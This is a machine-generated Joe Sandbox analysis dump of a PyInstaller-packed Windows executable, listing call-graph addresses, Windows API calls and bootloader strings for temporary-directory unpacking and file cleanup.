17279 7ff6029984c0 16966->17279 16967 7ff60299344b 17270 7ff602998380 CreateFileW 16967->17270 16969 7ff60299b5c0 _log10_special 8 API calls 16971 7ff6029934dd 16969->16971 16971->16905 16980 7ff6029918f0 16971->16980 16973 7ff6029934b3 16974 7ff60299342e 16973->16974 16977 7ff6029926c0 49 API calls 16973->16977 16974->16969 16975 7ff602993474 __vcrt_InitializeCriticalSectionEx 16975->16966 16976 7ff60299345c 17273 7ff6029926c0 16976->17273 16977->16974 16981 7ff602993f50 108 API calls 16980->16981 16982 7ff602991925 16981->16982 16983 7ff602991bb6 16982->16983 16984 7ff6029975f0 83 API calls 16982->16984 16985 7ff60299b5c0 _log10_special 8 API calls 16983->16985 16986 7ff60299196b 16984->16986 16987 7ff602991bd1 16985->16987 17019 7ff60299199c 16986->17019 17624 7ff60299f744 16986->17624 16987->16817 16987->16818 16989 7ff60299f0bc 74 API calls 16989->16983 16990 7ff602991985 16991 7ff6029919a1 16990->16991 16992 7ff602991989 16990->16992 17628 7ff60299f40c 16991->17628 17631 7ff602992760 16992->17631 16996 7ff6029919bf 16998 7ff602992760 53 API calls 16996->16998 16997 7ff6029919d7 16999 7ff6029919ee 16997->16999 17000 7ff602991a06 16997->17000 16998->17019 17001 7ff602992760 53 API calls 16999->17001 17002 7ff602991bf0 49 API calls 17000->17002 17001->17019 17003 7ff602991a1d 17002->17003 17004 7ff602991bf0 49 API calls 17003->17004 17005 7ff602991a68 17004->17005 17006 7ff60299f744 73 API calls 17005->17006 17007 7ff602991a8c 17006->17007 17008 7ff602991aa1 17007->17008 17009 7ff602991ab9 17007->17009 17010 7ff602992760 53 API calls 17008->17010 17011 7ff60299f40c _fread_nolock 53 API calls 17009->17011 17010->17019 17012 7ff602991ace 17011->17012 17013 7ff602991ad4 17012->17013 17014 7ff602991aec 17012->17014 17015 7ff602992760 53 API calls 17013->17015 17648 7ff60299f180 17014->17648 17015->17019 17018 7ff6029925f0 53 API calls 17018->17019 17019->16989 17021 7ff602997d6a 17020->17021 17022 7ff602998410 2 API calls 17021->17022 17023 7ff602997d89 
GetEnvironmentVariableW 17022->17023 17024 7ff602997df2 17023->17024 17025 7ff602997da6 ExpandEnvironmentStringsW 17023->17025 17026 7ff60299b5c0 _log10_special 8 API calls 17024->17026 17025->17024 17027 7ff602997dc8 17025->17027 17028 7ff602997e04 17026->17028 17029 7ff6029984c0 2 API calls 17027->17029 17028->16826 17030 7ff602997dda 17029->17030 17031 7ff60299b5c0 _log10_special 8 API calls 17030->17031 17032 7ff602997dea 17031->17032 17032->16826 17034 7ff602998410 2 API calls 17033->17034 17035 7ff602997ee4 17034->17035 17854 7ff6029a70b0 17035->17854 17037 7ff602997ef6 __vcrt_freefls 17037->16844 17039 7ff602991c15 17038->17039 17040 7ff6029a39f4 49 API calls 17039->17040 17041 7ff602991c38 17040->17041 17041->16858 17041->16859 17043 7ff602998175 17042->17043 17872 7ff602997aa0 GetCurrentProcess OpenProcessToken 17043->17872 17046 7ff602997aa0 7 API calls 17047 7ff6029981a1 17046->17047 17048 7ff6029981d4 17047->17048 17049 7ff6029981ba 17047->17049 17051 7ff602992590 48 API calls 17048->17051 17050 7ff602992590 48 API calls 17049->17050 17052 7ff6029981d2 17050->17052 17053 7ff6029981e7 LocalFree LocalFree 17051->17053 17052->17053 17054 7ff602998203 17053->17054 17056 7ff60299820f 17053->17056 17882 7ff602992940 17054->17882 17057 7ff60299b5c0 _log10_special 8 API calls 17056->17057 17058 7ff602993814 17057->17058 17094 7ff602998456 17093->17094 17095 7ff602998432 MultiByteToWideChar 17093->17095 17096 7ff602998473 MultiByteToWideChar 17094->17096 17097 7ff60299846c __vcrt_freefls 17094->17097 17095->17094 17095->17097 17096->17097 17097->16853 17099 7ff602996545 17098->17099 17100 7ff6029938d5 17099->17100 17101 7ff602992760 53 API calls 17099->17101 17102 7ff602996aa0 17100->17102 17101->17100 17103 7ff602996ad0 17102->17103 17112 7ff602996aea __vcrt_freefls 17102->17112 17103->17112 18057 7ff602991440 17103->18057 17105 7ff602996af4 17106 7ff602993fc0 49 API calls 17105->17106 17105->17112 17107 7ff602996b16 17106->17107 17108 7ff602996b1b 17107->17108 
17109 7ff602993fc0 49 API calls 17107->17109 17111 7ff602992870 53 API calls 17108->17111 17110 7ff602996b3a 17109->17110 17110->17108 17113 7ff602993fc0 49 API calls 17110->17113 17111->17112 17112->16869 17114 7ff602996b56 17113->17114 17114->17108 17115 7ff602996b5f 17114->17115 17116 7ff6029925f0 53 API calls 17115->17116 17117 7ff602996bcf memcpy_s __vcrt_freefls 17115->17117 17116->17112 17117->16869 17130 7ff6029930ee memcpy_s 17118->17130 17119 7ff60299b5c0 _log10_special 8 API calls 17120 7ff60299338e 17119->17120 17120->16905 17137 7ff602998140 LocalFree 17120->17137 17121 7ff6029932e7 17121->17119 17123 7ff602991bf0 49 API calls 17123->17130 17124 7ff602993309 17126 7ff6029925f0 53 API calls 17124->17126 17126->17121 17129 7ff6029932e9 17132 7ff6029925f0 53 API calls 17129->17132 17130->17121 17130->17123 17130->17124 17130->17129 17131 7ff602992870 53 API calls 17130->17131 17135 7ff6029932f7 17130->17135 18118 7ff602993ef0 17130->18118 18124 7ff602997480 17130->18124 18135 7ff6029915c0 17130->18135 18173 7ff602996880 17130->18173 18177 7ff602993b20 17130->18177 18221 7ff602993de0 17130->18221 17131->17130 17132->17121 17136 7ff6029925f0 53 API calls 17135->17136 17136->17121 17139 7ff60299262a 17138->17139 17140 7ff6029a39f4 49 API calls 17139->17140 17141 7ff602992652 17140->17141 17142 7ff602998410 2 API calls 17141->17142 17143 7ff60299266a 17142->17143 17144 7ff60299268e MessageBoxA 17143->17144 17145 7ff602992677 MessageBoxW 17143->17145 17150 7ff602993f5c 17149->17150 17151 7ff602998410 2 API calls 17150->17151 17152 7ff602993f84 17151->17152 17153 7ff602998410 2 API calls 17152->17153 17154 7ff602993f97 17153->17154 18341 7ff6029a4ff4 17154->18341 17157 7ff60299b5c0 _log10_special 8 API calls 17158 7ff602993746 17157->17158 17158->16822 17159 7ff6029975f0 17158->17159 17160 7ff602997614 17159->17160 17161 7ff60299f744 73 API calls 17160->17161 17166 7ff6029976eb __vcrt_freefls 17160->17166 17162 7ff602997630 17161->17162 17162->17166 18732 
7ff6029a6928 17162->18732 17164 7ff60299f744 73 API calls 17167 7ff602997645 17164->17167 17165 7ff60299f40c _fread_nolock 53 API calls 17165->17167 17166->16827 17167->17164 17167->17165 17167->17166 17169 7ff60299f0ec 17168->17169 18747 7ff60299ee98 17169->18747 17171 7ff60299f105 17171->16822 17173 7ff602991bf0 49 API calls 17172->17173 17174 7ff602993e8d 17173->17174 17174->16838 17176 7ff602991bf0 49 API calls 17175->17176 17177 7ff602993ff0 17176->17177 17177->16858 17188 7ff60299658c 17178->17188 17179 7ff60299b5c0 _log10_special 8 API calls 17181 7ff6029966c1 17179->17181 17180 7ff6029917e0 45 API calls 17180->17188 17181->16873 17182 7ff60299672d 17184 7ff6029925f0 53 API calls 17182->17184 17183 7ff602991bf0 49 API calls 17183->17188 17194 7ff6029966af 17184->17194 17185 7ff60299671a 17186 7ff6029925f0 53 API calls 17185->17186 17186->17194 17187 7ff602993ef0 10 API calls 17187->17188 17188->17180 17188->17182 17188->17183 17188->17185 17188->17187 17189 7ff6029966dd 17188->17189 17190 7ff602997480 52 API calls 17188->17190 17192 7ff602992870 53 API calls 17188->17192 17193 7ff602996707 17188->17193 17188->17194 17196 7ff6029915c0 118 API calls 17188->17196 17197 7ff6029966f0 17188->17197 17191 7ff6029925f0 53 API calls 17189->17191 17190->17188 17191->17194 17192->17188 17195 7ff6029925f0 53 API calls 17193->17195 17194->17179 17195->17194 17196->17188 17198 7ff6029925f0 53 API calls 17197->17198 17198->17194 18758 7ff6029980f0 17199->18758 17201 7ff602996929 17202 7ff6029980f0 3 API calls 17201->17202 17203 7ff60299693c 17202->17203 17204 7ff60299696f 17203->17204 17205 7ff602996954 17203->17205 17206 7ff6029925f0 53 API calls 17204->17206 18762 7ff602996e40 GetProcAddress 17205->18762 17208 7ff602993916 17206->17208 17208->16885 17209 7ff602996c70 17208->17209 17216 7ff6029928aa 17215->17216 17217 7ff6029a39f4 49 API calls 17216->17217 17218 7ff6029928d2 17217->17218 17219 7ff602998410 2 API calls 17218->17219 17220 7ff6029928ea 17219->17220 17221 
7ff60299290e MessageBoxA 17220->17221 17222 7ff6029928f7 MessageBoxW 17220->17222 17223 7ff602992920 17221->17223 17222->17223 17224 7ff60299b5c0 _log10_special 8 API calls 17223->17224 17225 7ff602992930 17224->17225 17226 7ff602996750 17225->17226 17230 7ff602996793 17226->17230 17231 7ff602996762 17226->17231 17230->16871 17231->17230 18823 7ff602995ad0 17232->18823 17240 7ff6029930b9 17241 7ff6029933a0 17240->17241 17242 7ff6029933ae 17241->17242 17243 7ff6029933bf 17242->17243 19096 7ff6029980d0 FreeLibrary 17242->19096 17243->16881 17252 7ff6029a44cc EnterCriticalSection 17245->17252 17254 7ff6029933ec GetModuleFileNameW 17253->17254 17254->16961 17254->16962 17256 7ff60299833f FindClose 17255->17256 17257 7ff602998352 17255->17257 17256->17257 17258 7ff60299b5c0 _log10_special 8 API calls 17257->17258 17259 7ff602993442 17258->17259 17259->16966 17259->16967 17261 7ff60299b8c0 17260->17261 17262 7ff6029929fc GetLastError 17261->17262 17263 7ff602992a29 17262->17263 17284 7ff6029a3c48 17263->17284 17268 7ff60299b5c0 _log10_special 8 API calls 17269 7ff602992ae5 17268->17269 17269->16974 17271 7ff6029983c0 GetFinalPathNameByHandleW CloseHandle 17270->17271 17272 7ff602993458 17270->17272 17271->17272 17272->16975 17272->16976 17274 7ff6029926fa 17273->17274 17275 7ff6029a3c48 48 API calls 17274->17275 17276 7ff602992722 MessageBoxW 17275->17276 17277 7ff60299b5c0 _log10_special 8 API calls 17276->17277 17278 7ff60299274c 17277->17278 17278->16974 17280 7ff6029984ea WideCharToMultiByte 17279->17280 17282 7ff602998515 17279->17282 17280->17282 17283 7ff60299852b __vcrt_freefls 17280->17283 17281 7ff602998532 WideCharToMultiByte 17281->17283 17282->17281 17282->17283 17283->16973 17286 7ff6029a3ca2 17284->17286 17285 7ff6029a3cc7 17287 7ff6029a9694 _invalid_parameter_noinfo 37 API calls 17285->17287 17286->17285 17288 7ff6029a3d03 17286->17288 17291 7ff6029a3cf1 17287->17291 17306 7ff6029a2000 17288->17306 17292 7ff60299b5c0 _log10_special 8 API calls 
17291->17292 17294 7ff602992a54 FormatMessageW 17292->17294 17293 7ff6029a97c8 __free_lconv_mon 11 API calls 17293->17291 17302 7ff602992590 17294->17302 17295 7ff6029a3de4 17295->17293 17296 7ff6029a3db9 17299 7ff6029a97c8 __free_lconv_mon 11 API calls 17296->17299 17297 7ff6029a3e0a 17297->17295 17298 7ff6029a3e14 17297->17298 17301 7ff6029a97c8 __free_lconv_mon 11 API calls 17298->17301 17299->17291 17300 7ff6029a3db0 17300->17295 17300->17296 17301->17291 17303 7ff6029925b5 17302->17303 17304 7ff6029a3c48 48 API calls 17303->17304 17305 7ff6029925d8 MessageBoxW 17304->17305 17305->17268 17307 7ff6029a203e 17306->17307 17308 7ff6029a202e 17306->17308 17309 7ff6029a2047 17307->17309 17313 7ff6029a2075 17307->17313 17312 7ff6029a9694 _invalid_parameter_noinfo 37 API calls 17308->17312 17310 7ff6029a9694 _invalid_parameter_noinfo 37 API calls 17309->17310 17311 7ff6029a206d 17310->17311 17311->17295 17311->17296 17311->17297 17311->17300 17312->17311 17313->17308 17313->17311 17317 7ff6029a2a14 17313->17317 17350 7ff6029a2460 17313->17350 17387 7ff6029a1bf0 17313->17387 17318 7ff6029a2ac7 17317->17318 17319 7ff6029a2a56 17317->17319 17322 7ff6029a2b20 17318->17322 17323 7ff6029a2acc 17318->17323 17320 7ff6029a2af1 17319->17320 17321 7ff6029a2a5c 17319->17321 17410 7ff6029a0dc4 17320->17410 17326 7ff6029a2a61 17321->17326 17327 7ff6029a2a90 17321->17327 17329 7ff6029a2b37 17322->17329 17330 7ff6029a2b2a 17322->17330 17334 7ff6029a2b2f 17322->17334 17324 7ff6029a2ace 17323->17324 17325 7ff6029a2b01 17323->17325 17328 7ff6029a2a70 17324->17328 17337 7ff6029a2add 17324->17337 17417 7ff6029a09b4 17325->17417 17326->17329 17332 7ff6029a2a67 17326->17332 17327->17332 17327->17334 17348 7ff6029a2b60 17328->17348 17390 7ff6029a31c8 17328->17390 17424 7ff6029a371c 17329->17424 17330->17320 17330->17334 17332->17328 17338 7ff6029a2aa2 17332->17338 17345 7ff6029a2a8b 17332->17345 17334->17348 17428 7ff6029a11d4 17334->17428 17337->17320 17340 7ff6029a2ae2 17337->17340 
17338->17348 17400 7ff6029a3504 17338->17400 17340->17348 17406 7ff6029a35c8 17340->17406 17342 7ff60299b5c0 _log10_special 8 API calls 17344 7ff6029a2e5a 17342->17344 17344->17313 17345->17348 17349 7ff6029a2d4c 17345->17349 17435 7ff6029a3830 17345->17435 17348->17342 17349->17348 17441 7ff6029ad888 17349->17441 17351 7ff6029a246e 17350->17351 17352 7ff6029a2484 17350->17352 17353 7ff6029a2ac7 17351->17353 17354 7ff6029a2a56 17351->17354 17356 7ff6029a24c4 17351->17356 17355 7ff6029a9694 _invalid_parameter_noinfo 37 API calls 17352->17355 17352->17356 17359 7ff6029a2b20 17353->17359 17360 7ff6029a2acc 17353->17360 17357 7ff6029a2af1 17354->17357 17358 7ff6029a2a5c 17354->17358 17355->17356 17356->17313 17368 7ff6029a0dc4 38 API calls 17357->17368 17363 7ff6029a2a61 17358->17363 17364 7ff6029a2a90 17358->17364 17366 7ff6029a2b37 17359->17366 17367 7ff6029a2b2a 17359->17367 17371 7ff6029a2b2f 17359->17371 17361 7ff6029a2ace 17360->17361 17362 7ff6029a2b01 17360->17362 17365 7ff6029a2a70 17361->17365 17376 7ff6029a2add 17361->17376 17373 7ff6029a09b4 38 API calls 17362->17373 17363->17366 17369 7ff6029a2a67 17363->17369 17364->17369 17364->17371 17370 7ff6029a31c8 47 API calls 17365->17370 17386 7ff6029a2b60 17365->17386 17372 7ff6029a371c 45 API calls 17366->17372 17367->17357 17367->17371 17382 7ff6029a2a8b 17368->17382 17369->17365 17374 7ff6029a2aa2 17369->17374 17369->17382 17370->17382 17375 7ff6029a11d4 38 API calls 17371->17375 17371->17386 17372->17382 17373->17382 17377 7ff6029a3504 46 API calls 17374->17377 17374->17386 17375->17382 17376->17357 17378 7ff6029a2ae2 17376->17378 17377->17382 17380 7ff6029a35c8 37 API calls 17378->17380 17378->17386 17379 7ff60299b5c0 _log10_special 8 API calls 17381 7ff6029a2e5a 17379->17381 17380->17382 17381->17313 17383 7ff6029a3830 45 API calls 17382->17383 17385 7ff6029a2d4c 17382->17385 17382->17386 17383->17385 17384 7ff6029ad888 46 API calls 17384->17385 17385->17384 17385->17386 17386->17379 17607 7ff6029a0038 
17387->17607 17391 7ff6029a31ee 17390->17391 17453 7ff60299fbf0 17391->17453 17395 7ff6029a3333 17397 7ff6029a33c1 17395->17397 17399 7ff6029a3830 45 API calls 17395->17399 17397->17345 17398 7ff6029a3830 45 API calls 17398->17395 17399->17397 17401 7ff6029a3539 17400->17401 17402 7ff6029a3557 17401->17402 17403 7ff6029a357e 17401->17403 17404 7ff6029a3830 45 API calls 17401->17404 17405 7ff6029ad888 46 API calls 17402->17405 17403->17345 17404->17402 17405->17403 17409 7ff6029a35e9 17406->17409 17407 7ff6029a9694 _invalid_parameter_noinfo 37 API calls 17408 7ff6029a361a 17407->17408 17408->17345 17409->17407 17409->17408 17411 7ff6029a0df7 17410->17411 17412 7ff6029a0e26 17411->17412 17415 7ff6029a0ee3 17411->17415 17413 7ff6029a0e63 17412->17413 17580 7ff60299fc98 17412->17580 17413->17345 17416 7ff6029a9694 _invalid_parameter_noinfo 37 API calls 17415->17416 17416->17413 17418 7ff6029a09e7 17417->17418 17419 7ff6029a0a16 17418->17419 17421 7ff6029a0ad3 17418->17421 17420 7ff60299fc98 12 API calls 17419->17420 17423 7ff6029a0a53 17419->17423 17420->17423 17422 7ff6029a9694 _invalid_parameter_noinfo 37 API calls 17421->17422 17422->17423 17423->17345 17425 7ff6029a375f 17424->17425 17427 7ff6029a3763 __crtLCMapStringW 17425->17427 17588 7ff6029a37b8 17425->17588 17427->17345 17430 7ff6029a1207 17428->17430 17429 7ff6029a1236 17431 7ff60299fc98 12 API calls 17429->17431 17434 7ff6029a1273 17429->17434 17430->17429 17432 7ff6029a12f3 17430->17432 17431->17434 17433 7ff6029a9694 _invalid_parameter_noinfo 37 API calls 17432->17433 17433->17434 17434->17345 17436 7ff6029a3847 17435->17436 17592 7ff6029ac838 17436->17592 17442 7ff6029ad8b9 17441->17442 17450 7ff6029ad8c7 17441->17450 17443 7ff6029ad8e7 17442->17443 17444 7ff6029a3830 45 API calls 17442->17444 17442->17450 17445 7ff6029ad91f 17443->17445 17446 7ff6029ad8f8 17443->17446 17444->17443 17448 7ff6029ad949 17445->17448 17449 7ff6029ad9aa 17445->17449 17445->17450 17600 7ff6029aef20 17446->17600 17448->17450 
17452 7ff6029ae720 _fread_nolock MultiByteToWideChar 17448->17452 17451 7ff6029ae720 _fread_nolock MultiByteToWideChar 17449->17451 17450->17349 17451->17450 17452->17450 17454 7ff60299fc16 17453->17454 17455 7ff60299fc27 17453->17455 17461 7ff6029ad3f0 17454->17461 17455->17454 17456 7ff6029ac47c _fread_nolock 12 API calls 17455->17456 17457 7ff60299fc54 17456->17457 17458 7ff60299fc68 17457->17458 17459 7ff6029a97c8 __free_lconv_mon 11 API calls 17457->17459 17460 7ff6029a97c8 __free_lconv_mon 11 API calls 17458->17460 17459->17458 17460->17454 17462 7ff6029ad40d 17461->17462 17463 7ff6029ad440 17461->17463 17464 7ff6029a9694 _invalid_parameter_noinfo 37 API calls 17462->17464 17463->17462 17465 7ff6029ad472 17463->17465 17472 7ff6029a3311 17464->17472 17470 7ff6029ad585 17465->17470 17478 7ff6029ad4ba 17465->17478 17466 7ff6029ad677 17507 7ff6029ac8dc 17466->17507 17468 7ff6029ad63d 17500 7ff6029acc74 17468->17500 17470->17466 17470->17468 17471 7ff6029ad60c 17470->17471 17474 7ff6029ad5cf 17470->17474 17475 7ff6029ad5c5 17470->17475 17493 7ff6029acf54 17471->17493 17472->17395 17472->17398 17483 7ff6029ad184 17474->17483 17475->17468 17477 7ff6029ad5ca 17475->17477 17477->17471 17477->17474 17478->17472 17479 7ff6029a9324 __std_exception_copy 37 API calls 17478->17479 17480 7ff6029ad572 17479->17480 17480->17472 17481 7ff6029a9780 _isindst 17 API calls 17480->17481 17482 7ff6029ad6d4 17481->17482 17516 7ff6029b2e2c 17483->17516 17487 7ff6029ad22c 17488 7ff6029ad281 17487->17488 17490 7ff6029ad24c 17487->17490 17492 7ff6029ad230 17487->17492 17569 7ff6029acd70 17488->17569 17490->17490 17565 7ff6029ad02c 17490->17565 17492->17472 17494 7ff6029b2e2c 38 API calls 17493->17494 17495 7ff6029acf9e 17494->17495 17496 7ff6029b2874 37 API calls 17495->17496 17497 7ff6029acfee 17496->17497 17498 7ff6029acff2 17497->17498 17499 7ff6029ad02c 45 API calls 17497->17499 17498->17472 17499->17498 17501 7ff6029b2e2c 38 API calls 17500->17501 17502 7ff6029accbf 17501->17502 
17503 7ff6029b2874 37 API calls 17502->17503 17504 7ff6029acd17 17503->17504 17505 7ff6029acd1b 17504->17505 17506 7ff6029acd70 45 API calls 17504->17506 17505->17472 17506->17505 17508 7ff6029ac921 17507->17508 17509 7ff6029ac954 17507->17509 17510 7ff6029a9694 _invalid_parameter_noinfo 37 API calls 17508->17510 17511 7ff6029ac96c 17509->17511 17514 7ff6029ac9ed 17509->17514 17513 7ff6029ac94d memcpy_s 17510->17513 17512 7ff6029acc74 46 API calls 17511->17512 17512->17513 17513->17472 17514->17513 17515 7ff6029a3830 45 API calls 17514->17515 17515->17513 17517 7ff6029b2e7f fegetenv 17516->17517 17518 7ff6029b6e0c 37 API calls 17517->17518 17522 7ff6029b2ed2 17518->17522 17519 7ff6029b2eff 17524 7ff6029a9324 __std_exception_copy 37 API calls 17519->17524 17520 7ff6029b2fc2 17521 7ff6029b6e0c 37 API calls 17520->17521 17523 7ff6029b2fec 17521->17523 17522->17520 17525 7ff6029b2eed 17522->17525 17526 7ff6029b2f9c 17522->17526 17527 7ff6029b6e0c 37 API calls 17523->17527 17528 7ff6029b2f7d 17524->17528 17525->17519 17525->17520 17529 7ff6029a9324 __std_exception_copy 37 API calls 17526->17529 17530 7ff6029b2ffd 17527->17530 17531 7ff6029b40a4 17528->17531 17535 7ff6029b2f85 17528->17535 17529->17528 17533 7ff6029b7000 20 API calls 17530->17533 17532 7ff6029a9780 _isindst 17 API calls 17531->17532 17534 7ff6029b40b9 17532->17534 17545 7ff6029b3066 memcpy_s 17533->17545 17536 7ff60299b5c0 _log10_special 8 API calls 17535->17536 17537 7ff6029ad1d1 17536->17537 17561 7ff6029b2874 17537->17561 17538 7ff6029b340f memcpy_s 17539 7ff6029b374f 17540 7ff6029b2990 37 API calls 17539->17540 17550 7ff6029b3e67 17540->17550 17541 7ff6029b36fb 17541->17539 17546 7ff6029b40bc memcpy_s 37 API calls 17541->17546 17542 7ff6029b3ec2 17552 7ff6029b4048 17542->17552 17558 7ff6029b2990 37 API calls 17542->17558 17560 7ff6029b40bc memcpy_s 37 API calls 17542->17560 17543 7ff6029b30a7 memcpy_s 17544 7ff6029b3503 memcpy_s 17543->17544 17549 7ff6029b39eb memcpy_s 17543->17549 17544->17541 17556 
7ff6029a4144 11 API calls _set_fmode 17544->17556 17557 7ff6029a9760 37 API calls _invalid_parameter_noinfo 17544->17557 17545->17538 17545->17543 17547 7ff6029a4144 _set_fmode 11 API calls 17545->17547 17546->17539 17548 7ff6029b34e0 17547->17548 17551 7ff6029a9760 _invalid_parameter_noinfo 37 API calls 17548->17551 17549->17539 17549->17541 17555 7ff6029a4144 11 API calls _set_fmode 17549->17555 17559 7ff6029a9760 37 API calls _invalid_parameter_noinfo 17549->17559 17550->17542 17553 7ff6029b40bc memcpy_s 37 API calls 17550->17553 17551->17543 17554 7ff6029b6e0c 37 API calls 17552->17554 17553->17542 17554->17535 17555->17549 17556->17544 17557->17544 17558->17542 17559->17549 17560->17542 17562 7ff6029b2893 17561->17562 17563 7ff6029a9694 _invalid_parameter_noinfo 37 API calls 17562->17563 17564 7ff6029b28be memcpy_s 17562->17564 17563->17564 17564->17487 17566 7ff6029ad058 memcpy_s 17565->17566 17567 7ff6029a3830 45 API calls 17566->17567 17568 7ff6029ad112 memcpy_s 17566->17568 17567->17568 17568->17492 17570 7ff6029acdab 17569->17570 17573 7ff6029acdf8 memcpy_s 17569->17573 17571 7ff6029a9694 _invalid_parameter_noinfo 37 API calls 17570->17571 17572 7ff6029acdd7 17571->17572 17572->17492 17573->17573 17574 7ff6029ace63 17573->17574 17576 7ff6029a3830 45 API calls 17573->17576 17575 7ff6029a9324 __std_exception_copy 37 API calls 17574->17575 17579 7ff6029acea5 memcpy_s 17575->17579 17576->17574 17577 7ff6029a9780 _isindst 17 API calls 17578 7ff6029acf50 17577->17578 17579->17577 17581 7ff60299fccf 17580->17581 17582 7ff60299fcbe 17580->17582 17581->17582 17583 7ff6029ac47c _fread_nolock 12 API calls 17581->17583 17582->17413 17584 7ff60299fd00 17583->17584 17585 7ff60299fd14 17584->17585 17587 7ff6029a97c8 __free_lconv_mon 11 API calls 17584->17587 17586 7ff6029a97c8 __free_lconv_mon 11 API calls 17585->17586 17586->17582 17587->17585 17589 7ff6029a37de 17588->17589 17590 7ff6029a37d6 17588->17590 17589->17427 17591 7ff6029a3830 45 API calls 17590->17591 

Control-flow Graph

[Control-flow graph 0, address range 7ff602991000-7ff602993536; nodes are marked Executed or Not Executed.]
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
• Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
• Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
Similarity
• API ID: FileModuleName
• String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$ERROR: failed to remove temporary directory: %s$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$MEI$PYINSTALLER_STRICT_UNPACK_MODE$Path exceeds PYI_PATH_MAX limit.$WARNING: failed to remove temporary directory: %s$_MEIPASS2$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-runtime-tmpdir

Control-flow Graph
APIs
• _get_daylight.LIBCMT ref: 00007FF6029B4AC5
  • Part of subcall function 00007FF6029B4418: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6029B442C
  • Part of subcall function 00007FF6029A97C8: RtlFreeHeap.NTDLL(?,?,?,00007FF6029B1AA2,?,?,?,00007FF6029B1ADF,?,?,00000000,00007FF6029B1FA5,?,?,?,00007FF6029B1ED7), ref: 00007FF6029A97DE
  • Part of subcall function 00007FF6029A97C8: GetLastError.KERNEL32(?,?,?,00007FF6029B1AA2,?,?,?,00007FF6029B1ADF,?,?,00000000,00007FF6029B1FA5,?,?,?,00007FF6029B1ED7), ref: 00007FF6029A97E8
  • Part of subcall function 00007FF6029A9780: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF6029A975F,?,?,?,?,?,00007FF6029A964A), ref: 00007FF6029A9789
  • Part of subcall function 00007FF6029A9780: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF6029A975F,?,?,?,?,?,00007FF6029A964A), ref: 00007FF6029A97AE
• _get_daylight.LIBCMT ref: 00007FF6029B4AB4
  • Part of subcall function 00007FF6029B4478: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6029B448C
• _get_daylight.LIBCMT ref: 00007FF6029B4D2A
• _get_daylight.LIBCMT ref: 00007FF6029B4D3B
• _get_daylight.LIBCMT ref: 00007FF6029B4D4C
• GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6029B4F8C), ref: 00007FF6029B4D73
Strings
Memory Dump Source
• Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
• Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
Similarity
• API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
• String ID: Eastern Standard Time$Eastern Summer Time

Control-flow Graph
APIs
Memory Dump Source
• Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
• Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
Similarity
• API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
• String ID:

Control-flow Graph

APIs
• FindFirstFileW.KERNELBASE(?,00007FF602997E49,00007FF6029939E6), ref: 00007FF60299796B
• RemoveDirectoryW.KERNEL32(?,00007FF602997E49,00007FF6029939E6), ref: 00007FF6029979EE
• DeleteFileW.KERNELBASE(?,00007FF602997E49,00007FF6029939E6), ref: 00007FF602997A0D
• FindNextFileW.KERNELBASE(?,00007FF602997E49,00007FF6029939E6), ref: 00007FF602997A1B
• FindClose.KERNELBASE(?,00007FF602997E49,00007FF6029939E6), ref: 00007FF602997A2C
• RemoveDirectoryW.KERNELBASE(?,00007FF602997E49,00007FF6029939E6), ref: 00007FF602997A35
Strings
Memory Dump Source
• Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
• Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmp
